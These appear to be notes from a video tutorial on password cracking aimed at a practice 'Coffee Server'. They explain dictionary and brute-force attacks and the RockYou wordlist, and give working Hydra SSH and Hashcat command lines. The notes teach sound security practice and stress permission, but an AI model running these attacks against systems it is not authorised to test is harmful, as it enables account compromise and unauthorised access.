Password Hacking Tutorial

Introduction

• Hacking into a server by cracking its password.
• Educational purposes only: only hack the provided server.

Goal

• Hack into the server called "Coffee Server" for free coffee.
• Username provided: dwight.schrute
• Mission: Crack the password.

Brute Force Attack

• Old-fashioned method of trying passwords sequentially.
• Example: 000000, 000001, 000002, and so on.
• Not efficient, can take years.
• Technically a brute force attack.

Dictionary Attack

• Using a list of common passwords.
• More effective because it tries likely passwords first.
• Hydra tool for online attacks.
  • Use on Kali Linux: hydra.
  • Command format: hydra -l [username] -P [password_file] [host] [service_type].
  • Example: hydra -l dwight.schrute -P wordlist.txt ssh://45.xxx.xxx.

RockYou Password List

• Historical list of passwords from RockYou hack in 2009.
• Contains 14 million passwords.
• Location in Kali Linux: /usr/share/wordlists/rockyou.txt.

Online vs Offline Attacks

Online

• Potential issues: firewalls, account lockouts, timeouts.

Offline

• Use of password hashes.
• Hashing: Converts password into a fixed string using algorithms (MD5, SHA-256).
• More secure storage; hackers can't easily read the password.

Hashcat Tool for Offline Cracking

• Works by comparing password's hash to known hash.
• Uses a word list and hash file.
• Example commands:
  • hashcat -a 0 -m 1800 -o crackpasswords.txt hashes.txt wordlist.txt
  • For Windows passwords: hashcat -a 0 -m 1000 -o crackpasswords.txt [hash] wordlist.txt

Practical Exercise

• Challenge encouraged for viewers to hack provided server.
• Two methods to use: Hydra for online, Hashcat for offline.

Closing Notes

• Legal ramifications: Only hack with explicit permission.
• Hashcat can leverage powerful CPUs and GPUs for massive word lists.
• Encourage responsible and legal use of the knowledge acquired.

Call to Action

• Like and subscribe if enjoyed.